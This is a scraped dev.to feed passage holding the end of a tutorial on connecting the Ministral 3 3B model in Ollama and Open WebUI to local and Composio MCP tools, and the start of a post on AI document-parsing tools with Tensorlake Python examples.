&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fni0ws3732a4uhxfs0ifi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fni0ws3732a4uhxfs0ifi.png" alt="Add tool in ollama webui"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, in a new chat, try saying something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"What's 6 + 7?"&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The model should use our added tool to answer the question.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F49nubkgszima56fnwxaf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F49nubkgszima56fnwxaf.png" alt="Ministral 3 3B returning response after a tool call"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 5: Add Remote MCP Tools for Function Calling
&lt;/h3&gt;

&lt;p&gt;But that's not fun. 😪 We want to use tools that are hosted remotely, right?&lt;/p&gt;

&lt;p&gt;For that, we can use Composio MCP, which is well-maintained and supports over 500 apps, so why not?&lt;/p&gt;

&lt;p&gt;Now we need the MCP URL... For that, head over to &lt;a href="https://docs.composio.dev/rest-api/tool-router/post-labs-tool-router-session?explorer=true" rel="noopener noreferrer"&gt;Composio API Reference&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Add your API key and the user ID, and make a request. You should get the MCP URL returned to you in a JSON format. Keep a note of the URL.&lt;/p&gt;
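&lt;p&gt;If you'd rather script this step than click through the API explorer, a request along these lines should work. Treat the endpoint URL and payload shape as assumptions inferred from the API reference page, and double-check them against the Composio docs:&lt;/p&gt;

```python
import json
import urllib.request

# ASSUMPTION: endpoint path inferred from the "labs tool router session"
# page in the Composio API reference; verify it in the docs before use.
SESSION_URL = "https://backend.composio.dev/api/v3/labs/tool_router/session"

def build_session_request(api_key: str, user_id: str) -> urllib.request.Request:
    """Build the POST request that asks Composio for a tool router session."""
    body = json.dumps({"user_id": user_id}).encode()
    return urllib.request.Request(
        SESSION_URL,
        data=body,
        headers={"x-api-key": api_key, "Content-Type": "application/json"},
    )

# Example (needs a real API key):
# with urllib.request.urlopen(build_session_request("YOUR_COMPOSIO_API_KEY", "default")) as resp:
#     print(json.loads(resp.read()))  # the MCP URL is in this JSON response
```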

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4x85415gpuhuiljg2dcj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4x85415gpuhuiljg2dcj.png" alt="Composio MCP URL"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 But is this the only way? &lt;strong&gt;No&lt;/strong&gt;, this is just a quick way I use to get the URL back without any coding. You can get it using &lt;a href="https://docs.composio.dev/tool-router/quickstart#using-tool-router-mcp" rel="noopener noreferrer"&gt;Python/TS code&lt;/a&gt; as well.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Now, you're almost there. All you need to do is add a new MCP server with this URL.&lt;/p&gt;

&lt;p&gt;Click on your profile icon at the top, under &lt;strong&gt;Admin Panel&lt;/strong&gt;, click on the &lt;strong&gt;Settings&lt;/strong&gt; tab, and under &lt;strong&gt;External Tools&lt;/strong&gt;, click on the "+" button to add external servers.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7wqsrcypb0tfpjuts05n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7wqsrcypb0tfpjuts05n.png" alt="Ollama webui new tool"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the dialog box, make sure that you switch to &lt;strong&gt;MCP Streamable HTTP&lt;/strong&gt; from &lt;strong&gt;OpenAPI&lt;/strong&gt;, and fill in the URL and give it a nice name and description.&lt;/p&gt;

&lt;p&gt;For Authentication, check &lt;strong&gt;None&lt;/strong&gt;; we will handle authentication with an additional &lt;code&gt;x-api-key&lt;/code&gt; header. In the Headers input, add the following JSON:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"x-api-key"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"YOUR_COMPOSIO_API_KEY"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Once that's done, click on &lt;strong&gt;Verify Connection&lt;/strong&gt;, and if everything went well, you should see "Connection Successful." That's pretty much all you need to do to use local and remote tools with the Ministral 3 3B model using Ollama.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffjwmz1wt6k1t1l3zzn77.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffjwmz1wt6k1t1l3zzn77.png" alt="Composio connection successful Ollama WebUI"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The steps here are going to be pretty much the same for any other model that supports tool calling.&lt;/p&gt;

&lt;p&gt;Here's an example of the model returning a response after doing tool calls:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsojydiu22ulqu11rdj3r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsojydiu22ulqu11rdj3r.png" alt="Ministral 3 3B tool call response"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; The model might take quite some time to answer the question and perform tool calls, and that pretty much depends on your system as well.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If you feel something is not working as expected, you can always check the logs of the Open WebUI container.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker logs &lt;span class="nt"&gt;-f&lt;/span&gt; open-webui
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuzl6ei4t20g0n5chd2z0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuzl6ei4t20g0n5chd2z0.png" alt="Docker log for a container"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Next Steps
&lt;/h2&gt;

&lt;p&gt;This entire demo was done using Ollama and Open WebUI. See if you can get it working with vLLM and Open WebUI instead. The steps are going to be quite similar.&lt;/p&gt;

&lt;p&gt;Just follow the &lt;a href="https://docs.vllm.ai/en/latest/getting_started/installation/" rel="noopener noreferrer"&gt;vLLM installation guide&lt;/a&gt; for your system, which should get you going.&lt;/p&gt;

&lt;p&gt;Let me know if you are able to make it work.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;That's it. We just ran a lightweight, quantized Ministral 3 3B model in Ollama, wrapped it with Open WebUI, and showed it can perform real tool calling, both with small local Python tools and remote MCP tools via Composio.&lt;/p&gt;

&lt;p&gt;You now have a simple local setup where the model can do more than just chat. The best part is, the steps won't change for other models, and you can quickly have your own local model that's entirely yours.&lt;/p&gt;

&lt;p&gt;Now, try adding more toolkits and models (if your system can handle it) and just experiment. You already have a clear understanding of Ministral 3 3B and running models locally with Ollama. Apply it to your actual work, and you'll thank me later.&lt;/p&gt;

&lt;p&gt;Well, that's all for now! I will see you in the next one. 🫡&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4hkkflgfwji3batcz86b.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4hkkflgfwji3batcz86b.gif" alt="Peace out GIF"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>mcp</category>
      <category>productivity</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>✌️5 AI Document Parsing Tools That Actually Work 🚀🔥</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Fri, 12 Dec 2025 12:35:04 +0000</pubDate>
      <link>https://dev.to/shricodev/5-ai-document-parsing-tools-that-actually-work-db6</link>
      <guid>https://dev.to/shricodev/5-ai-document-parsing-tools-that-actually-work-db6</guid>
      <description>&lt;p&gt;Working with real world documents is still pain. PDFs, invoices, random exports from legacy tools. Half the work is just getting them into a clean, structured format your models can use. 😕&lt;/p&gt;

&lt;p&gt;This post is about that first step. The one that usually gets ignored in demos and tutorials. Parsing and structuring the documents.&lt;/p&gt;

&lt;p&gt;The tools here handle OCR, layout, tables, forms, and file formats so you can focus on the logic around them.&lt;/p&gt;

&lt;p&gt;I am walking through a few I actually like using, with short code snippets you can drop straight into your own projects.&lt;/p&gt;

&lt;p&gt;So, let's begin. 🚀&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F66ivyn1gsm2s1393lclg.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F66ivyn1gsm2s1393lclg.gif" alt="Swag Man"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://www.tensorlake.ai/" rel="noopener noreferrer"&gt;1. Tensorlake&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 Document Ingestion API plus a serverless runtime for agentic data workflows&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtg78vd8vjz7gcvrlekk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtg78vd8vjz7gcvrlekk.png" alt="Tensorlake - Document Ingestion API plus a serverless runtime for agentic data workflows"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Tensorlake gives you two big things in one place:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;A Document Ingestion API that turns messy files into clean markdown or structured JSON&lt;/li&gt;
&lt;li&gt;A serverless platform to run agentic workflows on top of that data&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;You can send PDFs, Office files, images, or raw text and get back well-structured content with preserved layout. Long story short, you can treat it as a Document Ingestion API that handles PDFs, Office files, scans, and images, then build agent-style applications on top using their serverless runtime.&lt;/p&gt;

&lt;p&gt;So, instead of handling OCR and background jobs with retry logic, you get one single platform that parses, chunks, classifies and then feeds the results into the agent or tools.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;🤔 Is it for you?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you are building invoice extractors, contract analyzers, or any complex data ingestion or agents that need to actually read documents, Tensorlake sits right in the middle of your stack as the ingestion and workflow layer.&lt;/p&gt;

&lt;h3&gt;
  
  
  Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multi format parsing:&lt;/strong&gt; Parse PDFs, Office docs, spreadsheets, presentations, images and raw text to markdown or JSON.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layout aware output:&lt;/strong&gt; Preserves tables, sections and reading order so your RAG or search stays aligned with the original document, which many other tools miss.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy6fucbksmpbzth3uya9s.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy6fucbksmpbzth3uya9s.webp" alt="Tensorlake preserving layout in the generated response"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Schema based extraction:&lt;/strong&gt; Use JSON Schema or Pydantic models to pull out only the fields you care about.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Agentic runtime:&lt;/strong&gt; Decorate Python functions, run them in sandboxes and let Tensorlake handle scaling, retries and state.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;And many more...&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Now, let's go through a quick code example of some common use cases.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Code Example: From PDF to markdown
&lt;/h3&gt;

&lt;p&gt;First, install the SDK, then use the DocumentAI client to upload a PDF, start a parse job and iterate over the markdown chunks once parsing is done.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;tensorlake
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, to extract the text from a PDF, you can do something like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;tensorlake.documentai&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DocumentAI&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ParseStatus&lt;/span&gt;

&lt;span class="n"&gt;doc_ai&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;DocumentAI&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;api_key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;your-api-key&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Upload and parse document
&lt;/span&gt;&lt;span class="n"&gt;file_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;doc_ai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;upload&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/path/to/document.pdf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Start parsing
&lt;/span&gt;&lt;span class="n"&gt;parse_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;doc_ai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;parse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Wait until parsing is complete
&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;doc_ai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;wait_for_completion&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;parse_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;status&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;ParseStatus&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;SUCCESSFUL&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Each chunk is a piece of clean markdown
&lt;/span&gt;    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;chunk&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;chunks&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;chunk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the basic flow you would use in a backend job that takes uploaded PDFs and turns them into LLM-friendly text for something like RAG or search.&lt;/p&gt;

&lt;p&gt;Once you have the chunks, you can push them straight into a vector store or a database.&lt;/p&gt;
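&lt;p&gt;As a rough sketch of that last step, here is what pushing parsed chunks into a store can look like. The in-memory store and the hash-based "embedding" below are stand-ins so the snippet is self-contained; in practice you would use a real embedding model and vector database:&lt;/p&gt;

```python
import hashlib

# Stand-in for a real embedding model: map text to a small fixed-size vector.
def fake_embed(text: str, dim: int = 8) -> list[float]:
    digest = hashlib.sha256(text.encode()).digest()
    return [b / 255 for b in digest[:dim]]

# Stand-in for a real vector database collection.
class InMemoryStore:
    def __init__(self):
        self.records = []

    def add(self, doc_id: str, text: str) -> None:
        self.records.append({"id": doc_id, "text": text, "embedding": fake_embed(text)})

# In the parsing example above, these would come from result.chunks (chunk.content)
chunks = ["## Invoice\nTotal: $120", "## Terms\nNet 30 days"]

store = InMemoryStore()
for i, content in enumerate(chunks):
    store.add(doc_id=f"doc-1-chunk-{i}", text=content)

print(len(store.records))  # one record per chunk
```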

&lt;p&gt;You can get more control over parsing, such as structured extraction, which you can find here: &lt;a href="https://github.com/tensorlakeai/tensorlake#structured-extraction" rel="noopener noreferrer"&gt;Structured Extraction&lt;/a&gt;. I'll leave it to you to explore that further.&lt;/p&gt;
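&lt;p&gt;To give a feel for what structured extraction starts from, the schema is just a Pydantic model (or equivalent JSON Schema) describing the fields you want back. The invoice fields below are made up for illustration, and the exact way you pass the schema to the parse call is covered in the linked docs:&lt;/p&gt;

```python
from pydantic import BaseModel

# Hypothetical invoice schema: only these fields would be extracted.
class Invoice(BaseModel):
    invoice_number: str
    vendor_name: str
    total_amount: float

# The JSON Schema derived from the model is what the API ultimately consumes.
print(Invoice.model_json_schema()["required"])
```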

&lt;h3&gt;
  
  
  Code Example: Tiny agentic app on the Tensorlake runtime
&lt;/h3&gt;

&lt;p&gt;To run a small agentic app on top of Tensorlake, it's as simple as:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;agents&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Agent&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Runner&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;agents.tool&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;WebSearchTool&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;function_tool&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;tensorlake.applications&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;application&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;function&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;run_local_application&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Image&lt;/span&gt;

&lt;span class="c1"&gt;# Container image with the dependencies the function needs
&lt;/span&gt;&lt;span class="n"&gt;FUNCTION_CONTAINER_IMAGE&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Image&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;base_image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;python:3.11-slim&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;city_guide_image&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;run&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;pip install openai openai-agents&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="nd"&gt;@function_tool&lt;/span&gt;
&lt;span class="nd"&gt;@function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;description&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Gets the weather for a city&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;secrets&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
    &lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;FUNCTION_CONTAINER_IMAGE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get_weather_tool&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;agent&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Agent&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
        &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Weather Reporter&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;instructions&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Use web search to find current weather in the city&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="n"&gt;tools&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nc"&gt;WebSearchTool&lt;/span&gt;&lt;span class="p"&gt;()],&lt;/span&gt;
    &lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Runner&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;run_sync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;agent&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;City: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;city&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;final_output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

